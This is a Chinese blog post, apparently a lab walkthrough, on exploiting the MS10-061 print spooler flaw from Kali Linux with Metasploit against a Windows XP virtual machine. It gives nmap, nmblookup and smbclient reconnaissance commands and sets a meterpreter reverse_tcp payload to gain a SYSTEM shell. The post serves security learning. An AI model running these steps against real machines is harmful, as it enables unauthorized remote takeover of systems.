Kali利用msf对MS10_061漏洞进行渗透测试

注意事项:

  • kail首次打开metasploit,会初始化数据,可能会有点慢,请耐心等待!
  • 本文仅供学习漏洞渗透测试,不得用于其他非法用途,否则造成的任何后果自负!!!
1. Metasploit简介

Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。详细介绍可以参考百度百科对 Mettasploit 的介绍。

2.打印后台程序服务模拟漏洞(CVE-2010-2729/MS10-061)

利用MSF中的攻击模块:ms10_061_spoolss,Windows打印后台程序没有充分的限制访问该服务的用户权限,攻击者可以通过提交特制的打印请求在Windows系统目录(%SystemRoot%\system32)中创建文件。攻击者可以指定任何文件名,包括目录遍历,通过WritePrinter请求,攻击者可以完全控制创建文件的内容。将文件写入到Windows系统目录(%SystemRoot%\system32)后,通过WMI来部署恶意程序,因为系统会自动运行%SystemRoot%\System32\Wbem\MOF文件夹的mof文件、执行命令。
该漏洞首次被发现并被利用于著名的Stuxnet蠕虫(俗称“震网”)

3.实验环境

VMware虚拟环境
攻击机:Kali Linux;目标机:Windows xp sp2

4.实验步骤

4.1 使用Nmap扫描目标机器是否存在NetBiosRPC服务
4.2 NetBios共享检测
4.3 使用MSF的ms10_061_spoolss模块攻击目标机

5.设置目标机环境
  1. 获取目标机IP在这里插入图片描述
  2. 创建打印共享(默认是没有打印共享)
    1)代开控制面板,选择打印机和其他硬件在这里插入图片描述2)选择打印机和传真在这里插入图片描述
    3)添加打印机在这里插入图片描述4)本地打印机,不勾选“自动检测并安装即插即用打印机”在这里插入图片描述
    5)选择使用LPT1端口在这里插入图片描述
    随便选一个打印机厂商和型号在这里插入图片描述取个名字在这里插入图片描述选择共享打印机在这里插入图片描述
6.在Kali上检测打印机

1)nmap扫描

nmap -sS -sU -O -p127-139,445 192.168.230.137

 
 
  • 1

在这里插入图片描述
2)查找NetBIOS

nmblookup -A 192.168.230.137

 
 
  • 1

在这里插入图片描述
NetBIOS工作站名字:123-13DFCFEDD88
NetBIOS组名:WORKGROUP

7.访问SMB资源
smbclient -L \\123-13DFCFEDD88 -I 192.168.230.137 -N

 
 
  • 1


看到了打印共享

8.使用MSF模块攻击

1)载入模块,搜索一下ms10_061在这里插入图片描述
2)利用漏洞,并查看需要配置的参数
在这里插入图片描述
3)配置参数在这里插入图片描述4)设置Payload

set payload windows/meterpreter/reverse_tcp

 
 
  • 1

5)设置Payload参数在这里插入图片描述6)攻击在这里插入图片描述攻击完成后,建立了远程会话,恶意程序写入到目标机的%SystemRoot%\system32\2Uy3ygTXtpVrWD.exe,恶意程序是通过%SystemRoot%\system32\wbem\mof\5V4jdMrNNFWWSH.mof控制运行的。
7)接下来可以执行一系列操作
getuidgetpid在这里插入图片描述
可以看到我们获取了系统的system权限

此时执行shell可以进入目标机的命令行界面在这里插入图片描述
至此,整个攻击过程已经大体结束,之后可以进行取证等一系列工作。最后感谢各位的阅读,由于本人水平有限,如有不足,敬请谅解。

  • 6
    点赞
  • 30
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值